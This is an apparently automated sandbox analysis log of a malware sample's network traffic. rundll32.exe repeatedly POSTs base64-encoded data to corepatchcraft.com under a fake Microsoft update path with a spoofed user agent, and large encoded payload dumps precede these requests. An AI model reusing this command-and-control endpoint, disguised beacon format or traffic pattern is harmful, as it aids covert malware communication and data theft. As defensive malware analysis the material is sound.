                        Data Ascii: z51mxgWymaqqaE3DC43HvDePTE69gJWmgYSCvYCVpoGEG/qg2oZlwQONf5nhALTHcMUYbsQJRvoZpa0PTE9xTFnhCLSJMURYak1IxTywnmsJLEZhxwxmxB2m+glR4wisxTyw2qtBwQOdxwyGxB22+gmx4wioxTyo0CeRwxuRx1vjCJDFPJDSe8QduvoJoa1NLAh5XNIntY9PuQpResYdtvoJreMPTM0MuFkfRI8LgUxZak2jR/oBrWk
                        2025-01-16 05:02:08 UTC16384INData Raw: 70 6f 47 45 67 72 30 5a 30 6f 59 6e 74 79 59 52 72 56 35 36 4b 65 6c 4f 63 55 78 5a 0d 0a 4f 69 6e 42 61 33 46 4d 57 57 6f 63 79 36 4a 74 48 77 38 39 78 43 32 2b 2b 41 47 78 34 51 69 67 78 7a 53 51 30 69 65 52 77 51 4f 52 78 77 79 4b 78 6b 72 48 4e 4b 6a 53 4a 30 56 48 38 43 42 42 0d 0a 33 4c 68 43 7a 66 39 78 54 46 6e 68 43 45 44 4e 73 56 77 4a 34 51 43 67 70 6b 69 2f 70 70 58 45 44 61 4c 36 41 62 58 68 47 45 54 48 49 45 6a 53 4c 36 48 44 41 33 6e 47 43 47 62 46 47 45 4c 36 0d 0a 43 62 31 6c 38 77 42 44 39 49 55 74 62 4d 59 64 6f 76 67 5a 76 61 30 49 74 45 35 78 54 46 6e 68 43 4b 51 65 2b 67 46 52 34 56 77 61 78 54 79 6b 73 51 32 79 74 37 48 34 43 59 48 68 43 4b 54 46 0d 0a 50 4a 54 51 59 73 59 64 6f 69 50 48 48 47 4c 47 41 45 59 67 78 78 53 43 70 51 47
                        Data Ascii: poGEgr0Z0oYntyYRrV56KelOcUxZOinBa3FMWWocy6JtHw89xC2++AGx4QigxzSQ0ieRwQORxwyKxkrHNKjSJ0VH8CBB3LhCzf9xTFnhCEDNsVwJ4QCgpki/ppXEDaL6AbXhGETHIEjSL6HDA3nGCGbFGEL6Cb1l8wBD9IUtbMYdovgZva0ItE5xTFnhCKQe+gFR4VwaxTyksQ2yt7H4CYHhCKTFPJTQYsYdoiPHHGLGAEYgxxSCpQG
                        2025-01-16 05:02:08 UTC16384INData Raw: 74 37 46 43 6a 4a 69 4b 54 55 76 4c 0d 0a 76 62 4b 6d 6c 63 54 4e 68 6f 2b 7a 70 75 45 41 75 4d 63 38 2f 4e 4c 2f 68 62 61 78 6a 73 55 4d 78 73 59 4e 51 76 6f 42 53 65 50 49 61 4c 47 4f 73 39 44 6e 61 62 65 78 6a 71 64 4c 34 52 6a 34 0d 0a 7a 5a 74 4e 30 44 2f 39 77 77 76 64 7a 35 6c 72 78 41 33 69 38 6a 48 70 61 6a 74 6f 77 2f 78 73 70 70 57 79 77 63 4f 31 73 71 61 56 78 68 33 69 66 76 70 62 4f 73 62 46 69 6f 2b 7a 70 6f 4b 77 0d 0a 57 30 39 78 70 35 48 68 77 47 69 78 6a 72 50 53 2f 32 6d 33 73 59 37 46 31 44 4b 7a 74 37 48 34 32 51 57 55 73 72 66 46 39 42 53 6e 6c 62 4c 44 77 79 32 79 70 70 58 45 44 55 4c 34 41 55 6d 44 0d 0a 7a 55 70 4f 63 63 30 6b 77 6b 31 4a 54 6e 46 44 33 42 4a 4d 53 45 37 38 32 58 6d 55 73 72 66 48 4a 4f 6a 53 4c 2b 6e 42 79 7a 47
                        Data Ascii: t7FCjJiKTUvLvbKmlcTNho+zpuEAuMc8/NL/hbaxjsUMxsYNQvoBSePIaLGOs9DnabexjqdL4Rj4zZtN0D/9wwvdz5lrxA3i8jHpajtow/xsppWywcO1sqaVxh3ifvpbOsbFio+zpoKwW09xp5HhwGixjrPS/2m3sY7F1DKzt7H42QWUsrfF9BSnlbLDwy2yppXEDUL4AUmDzUpOcc0kwk1JTnFD3BJMSE782XmUsrfHJOjSL+nByzG
                        2025-01-16 05:02:08 UTC16384INData Raw: 31 47 2b 42 6d 4a 34 51 6a 38 78 7a 53 59 30 69 65 5a 77 51 4f 35 78 77 79 36 78 42 32 43 2b 67 6d 56 4f 73 59 46 68 70 6d 77 38 47 70 4e 49 6b 37 38 41 65 6b 37 70 55 6e 45 6a 72 50 61 0d 0a 72 6b 56 48 2b 4b 48 4a 69 78 39 61 49 46 68 4e 54 46 6b 43 6e 51 35 47 59 53 52 42 4e 30 56 59 70 69 46 50 58 32 72 4f 6a 45 4b 32 43 5a 31 71 54 55 68 4f 2f 41 48 74 34 77 43 67 78 53 53 6b 0d 0a 30 6d 6a 45 44 59 37 36 41 62 48 68 47 49 7a 48 59 4d 63 63 71 73 51 4e 38 76 6f 42 35 65 4d 41 38 49 6b 30 73 4b 61 56 73 72 66 44 50 50 79 78 63 70 46 49 54 76 6f 4a 34 65 45 41 76 43 72 34 0d 0a 51 56 6c 71 54 55 6a 46 6c 42 47 61 70 6f 47 45 67 72 32 41 6c 54 2f 47 70 4d 32 64 43 4e 51 76 73 73 45 4c 67 53 5a 59 35 77 43 33 48 35 6d 46 4f 47 68 4e 79 34 70 35 78 52 79
                        Data Ascii: 1G+BmJ4Qj8xzSY0ieZwQO5xwy6xB2C+gmVOsYFhpmw8GpNIk78Aek7pUnEjrParkVH+KHJix9aIFhNTFkCnQ5GYSRBN0VYpiFPX2rOjEK2CZ1qTUhO/AHt4wCgxSSk0mjEDY76AbHhGIzHYMccqsQN8voB5eMA8Ik0sKaVsrfDPPyxcpFITvoJ4eEAvCr4QVlqTUjFlBGapoGEgr2AlT/GpM2dCNQvssELgSZY5wC3H5mFOGhNy4p5xRy
                        2025-01-16 05:02:08 UTC16384INData Raw: 58 46 48 4f 4c 30 54 45 35 78 54 44 4b 37 73 73 4d 4c 2b 55 38 4a 62 73 51 64 79 76 6f 42 33 65 46 63 77 52 76 78 78 78 7a 71 7a 58 42 50 0d 0a 42 45 57 65 4c 35 46 4a 54 6e 46 4d 73 6d 32 4b 44 5a 4a 78 54 46 6c 71 78 77 57 53 2b 51 47 75 5a 66 73 64 75 66 53 65 4c 48 30 6c 51 56 78 78 54 44 47 36 43 30 42 65 47 65 41 36 59 6c 32 67 0d 0a 39 36 56 4a 57 65 6d 4a 52 4d 55 38 73 4e 6f 54 58 55 67 37 5a 69 52 54 65 45 31 49 4a 71 45 4b 55 58 6f 6c 6f 43 31 35 58 4c 48 7a 6d 55 31 4f 38 6f 68 56 34 51 68 41 78 2f 51 77 70 70 57 79 0d 0a 79 36 4a 68 78 35 58 6a 36 44 69 78 6a 72 50 53 2f 7a 47 33 73 59 34 65 73 59 4d 4a 74 37 48 36 43 61 58 68 42 56 69 6d 6e 2f 68 5a 61 73 59 46 73 76 6f 4e 53 65 47 6f 46 59 78 31 54 4a 57 6d 0d 0a 47 4d 4f 69 47 37 4d 78 78
                        Data Ascii: XFHOL0TE5xTDK7ssML+U8JbsQdyvoB3eFcwRvxxxzqzXBPBEWeL5FJTnFMsm2KDZJxTFlqxwWS+QGuZfsdufSeLH0lQVxxTDG6C0BeGeA6Yl2g96VJWemJRMU8sNoTXUg7ZiRTeE1IJqEKUXoloC15XLHzmU1O8ohV4QhAx/QwppWyy6Jhx5Xj6DixjrPS/zG3sY4esYMJt7H6CaXhBVimn/hZasYFsvoNSeGoFYx1TJWmGMOiG7Mxx
                        2025-01-16 05:02:08 UTC16384INData Raw: 41 36 53 59 38 4c 6a 62 4f 6d 6c 62 4c 46 41 37 6d 6b 66 47 46 50 53 45 48 48 43 5a 45 36 0d 0a 77 41 57 65 6d 58 51 63 61 45 33 44 43 33 6d 6c 51 6d 68 4e 53 4d 55 38 76 4e 71 72 53 63 48 44 67 62 4b 6d 6c 66 64 4d 54 6e 46 4d 4d 71 69 79 77 38 4f 42 73 71 61 56 54 67 6c 4b 2b 4d 6d 31 0d 0a 6c 4c 4b 33 78 65 53 67 70 35 57 79 77 30 7a 34 79 62 47 55 73 72 66 46 2f 4b 53 6e 6c 62 4c 49 64 33 41 35 55 4b 30 49 36 45 39 78 54 46 6d 42 53 6f 38 4c 30 55 78 5a 61 6b 33 43 47 39 48 45 0d 0a 44 4c 56 43 2f 67 75 75 79 5a 6b 66 57 69 42 70 59 6b 78 5a 41 70 30 4f 52 6d 45 6b 39 51 6c 46 57 4b 61 65 36 56 78 71 7a 6f 78 43 2b 68 6d 70 36 54 64 6b 54 67 52 46 6e 69 2f 52 53 55 35 78 0d 0a 54 4c 4a 74 69 67 33 53 63 55 78 5a 61 73 63 4e 30 76 6b 4a 68 32 58 37 42
                        Data Ascii: A6SY8LjbOmlbLFA7mkfGFPSEHHCZE6wAWemXQcaE3DC3mlQmhNSMU8vNqrScHDgbKmlfdMTnFMMqiyw8OBsqaVTglK+Mm1lLK3xeSgp5Wyw0z4ybGUsrfF/KSnlbLId3A5UK0I6E9xTFmBSo8L0UxZak3CG9HEDLVC/guuyZkfWiBpYkxZAp0ORmEk9QlFWKae6VxqzoxC+hmp6TdkTgRFni/RSU5xTLJtig3ScUxZascN0vkJh2X7B
                        2025-01-16 05:02:08 UTC16384INData Raw: 4b 33 39 48 42 4d 57 57 72 49 6d 6a 74 71 0d 0a 69 68 79 6f 54 59 38 4c 6a 62 4f 6d 6c 62 4c 46 41 36 32 6b 31 4b 4e 4d 53 4d 51 30 6a 72 41 7a 51 45 68 4f 6d 43 31 64 61 6b 33 44 43 34 48 50 6d 54 49 64 77 77 4e 35 70 4c 6a 41 73 72 66 33 0d 0a 63 45 78 5a 61 73 69 42 4f 32 71 4b 48 4b 74 4e 6a 77 75 4e 73 36 61 56 73 73 55 44 72 61 51 4d 6f 30 78 49 78 44 53 4e 73 45 74 41 53 45 36 59 5a 56 31 71 54 63 4d 62 67 63 66 62 36 6b 31 49 0d 0a 54 76 72 47 33 57 70 4e 53 4d 66 30 4d 4b 53 56 73 73 48 44 38 62 47 6d 6c 63 62 64 4d 6f 79 7a 70 75 48 49 79 4c 4f 4f 73 39 44 2f 4c 62 57 78 6a 73 58 63 44 72 43 33 73 66 7a 42 4f 5a 65 79 0d 0a 74 78 2f 36 41 56 47 43 69 2f 61 78 6a 76 5a 59 61 6b 31 49 79 36 4d 35 51 71 77 49 69 45 36 32 43 61 57 56 73 72 65 78 2f
                        Data Ascii: K39HBMWWrImjtqihyoTY8LjbOmlbLFA62k1KNMSMQ0jrAzQEhOmC1dak3DC4HPmTIdwwN5pLjAsrf3cExZasiBO2qKHKtNjwuNs6aVssUDraQMo0xIxDSNsEtASE6YZV1qTcMbgcfb6k1ITvrG3WpNSMf0MKSVssHD8bGmlcbdMoyzpuHIyLOOs9D/LbWxjsXcDrC3sfzBOZeytx/6AVGCi/axjvZYak1Iy6M5QqwIiE62CaWVsrex/
                        2025-01-16 05:02:08 UTC16384INData Raw: 42 61 72 36 47 62 32 74 54 30 68 4f 63 55 7a 53 4c 36 6d 50 44 6e 56 4d 57 57 70 4e 77 77 4f 56 69 78 68 69 54 55 68 4f 63 59 6f 63 6c 6b 7a 44 47 35 6e 50 6d 33 72 45 48 5a 4c 36 43 59 58 6a 0d 0a 43 49 7a 44 50 4c 34 49 5a 66 73 64 76 79 50 48 46 4b 36 6c 4e 66 47 50 73 39 49 76 6b 59 38 4f 66 55 78 5a 61 6b 32 4f 43 34 31 4f 30 69 65 6c 79 34 39 52 78 52 53 79 78 68 32 57 2b 42 6d 5a 0d 0a 35 77 69 34 48 6e 37 36 46 49 55 63 77 77 4f 78 70 42 62 56 73 37 66 46 4a 4a 53 65 4b 45 46 49 54 6e 46 4d 6e 79 2b 78 53 38 55 30 70 4a 34 71 66 55 68 4f 63 55 7a 53 4a 36 57 4f 44 30 56 4d 0d 0a 30 6a 2b 6c 79 34 78 4a 78 51 79 2b 39 55 78 4f 63 55 77 79 6f 6b 54 44 47 36 57 4c 58 57 42 4e 53 45 35 78 69 68 79 57 53 63 55 4c 66 52 7a 53 4a 35 6d 67 4f 2b 4a 4e 57
                        Data Ascii: Bar6Gb2tT0hOcUzSL6mPDnVMWWpNwwOVixhiTUhOcYoclkzDG5nPm3rEHZL6CYXjCIzDPL4IZfsdvyPHFK6lNfGPs9IvkY8OfUxZak2OC41O0iely49RxRSyxh2W+BmZ5wi4Hn76FIUcwwOxpBbVs7fFJJSeKEFITnFMny+xS8U0pJ4qfUhOcUzSJ6WOD0VM0j+ly4xJxQy+9UxOcUwyokTDG6WLXWBNSE5xihyWScULfRzSJ5mgO+JNW
                        2025-01-16 05:02:08 UTC16384INData Raw: 6d 58 67 62 62 6b 32 50 43 34 32 7a 70 70 57 79 78 51 50 4e 70 43 6b 45 54 45 6a 46 4e 4b 44 61 55 6b 30 39 57 52 6d 6a 66 47 70 4e 49 4a 34 33 0d 0a 52 45 6b 43 34 52 78 47 59 61 54 6f 63 45 68 49 7a 62 56 41 30 6a 2b 68 77 30 7a 37 52 4e 45 6e 70 63 67 7a 6d 55 30 74 59 73 30 31 70 6e 4d 34 63 6f 45 66 77 78 75 64 78 78 78 69 78 67 4a 4b 0d 0a 53 67 52 64 48 30 53 50 43 35 56 4e 57 57 70 4e 6f 30 6d 32 43 62 31 71 54 55 68 4f 2b 78 6d 39 34 68 69 37 78 44 53 2f 73 6a 62 47 44 61 4c 36 41 56 48 68 48 55 42 31 49 45 51 73 59 34 6f 4e 0d 0a 72 6e 42 4d 57 57 71 6d 54 34 6b 30 72 46 6c 71 54 55 6a 45 4e 4b 7a 52 4c 37 2f 43 43 34 4f 6e 61 75 45 41 51 4d 55 67 51 4e 41 2f 6d 63 4d 4c 6e 63 63 52 5a 73 51 46 6c 76 6f 5a 67 56 45 59 0d 0a 6e 44 74 34 69 78 79
                        Data Ascii: mXgbbk2PC42zppWyxQPNpCkETEjFNKDaUk09WRmjfGpNIJ43REkC4RxGYaTocEhIzbVA0j+hw0z7RNEnpcgzmU0tYs01pnM4coEfwxudxxxixgJKSgRdH0SPC5VNWWpNo0m2Cb1qTUhO+xm94hi7xDS/sjbGDaL6AVHhHUB1IEQsY4oNrnBMWWqmT4k0rFlqTUjENKzRL7/CC4OnauEAQMUgQNA/mcMLnccRZsQFlvoZgVEYnDt4ixy


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.64974694.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:09 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:09 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:09 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:09 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:09 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.64975494.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:10 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:10 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:11 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:10 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:11 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.64976794.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:11 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:11 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:12 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:12 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:12 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.64977794.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:13 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:13 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:13 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:13 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:13 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        13192.168.2.64978494.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:14 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:14 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:15 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:14 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:15 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        14192.168.2.64979494.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:15 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:15 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:16 UTC217INHTTP/1.1 200 OK
